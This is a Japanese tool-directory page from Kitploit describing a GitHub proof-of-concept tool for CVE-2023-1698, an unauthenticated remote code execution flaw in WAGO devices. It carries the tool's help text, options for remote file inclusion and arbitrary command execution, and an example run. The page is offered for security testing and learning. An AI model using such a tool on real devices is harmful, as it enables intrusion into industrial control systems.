Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
WAGO-CVE-2023-1698 — WAGOシステムにおけるリモートコード実行の脆弱性(CVE-2023-1698) | Kitploit
ツール/GitHubGitHub/thedarknessdied/wago-cve-2023-1698
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHubthedarknessdied/wago-cve-2023-1698

WAGO-CVE-2023-1698

WAGOシステムにおけるリモートコード実行の脆弱性(CVE-2023-1698)

リポジトリを見る
22年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

WAGO-CVE-2023-1698

WAGOシステムリモートコード実行の脆弱性(CVE-2023-1698)

注意

私はローカルテストおよびPOC開発用のツールを作成しました。これは技術学習の参考のみを目的としています。違法な目的には使用しないでください。この記事で提供される情報を個人または組織が使用したことによる直接的・間接的な結果および損失は、すべて利用者自身の責任であり、作者とは一切関係ありません!!!

image

説明

WAGOは、電気的相互接続、オートメーション、およびインターフェース電子技術を専門とする企業です。WAGOの複数の製品において、認証されていないリモート攻撃者が新しいユーザーを作成し、デバイス構成を変更できる脆弱性が存在します。これにより、リモートRCE、サービス拒否、システム全体への損害を引き起こす可能性があります。

インストール

pip install -r requirements.txt

ツール使用方法

root@kitploit:~
python "WAGO-CVE-2023-1698 .py" -h
usage: WAGO-CVE-2023-1698 .py [-h] (-u URL | -f FILE)
                              [--remote-file-include REMOTE_FILE_INCLUDE | --local-file-include LOCAL_FILE_INCLUDE | --remote-command REMOTE_COMMAND]
                              [--random-agent RANDOM_AGENT] [-d DELAY] [-t THREAD] [--proxy PROXY] [--type TYPE] [-o OUTPUT]

WAGO System Remote Code Execution Vulnerability (CVE-2023-1698)

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Enter target object
  -f FILE, --file FILE  Input target object file
  --remote-file-include REMOTE_FILE_INCLUDE
                        Enter the filepath(it must be On the public network)
  --local-file-include LOCAL_FILE_INCLUDE
                        Enter the filepath(it must be On the local)
  --remote-command REMOTE_COMMAND
                        Enter the command you want to execute
  --random-agent RANDOM_AGENT
                        Using random user agents
  -d DELAY, --delay DELAY
                        Set multi threaded access latency (setting range from 0 to 5)
  -t THREAD, --thread THREAD
                        Set the number of program threads (setting range from 1 to 50)
  --proxy PROXY         Set up the proxy
  --type TYPE           Set up the remote upload file type
  -o OUTPUT, --output OUTPUT
                        output filename

パラメータ

--remote-file-include: リモートファイルのURLを指定します。curlまたはwgetを使用して、ファイルをtmpディレクトリまたは現在のディレクトリにアップロードします。 --local-file-include: ローカルのシェルスクリプトファイルを解析し、リモートで実行します。 --remote-command REMOTE: システムコマンドを実行します。

例

python wago.py -u ** --proxy http://127.0.0.1:10809 --remote-command "cat /var/log/wago"

ツールをダウンロード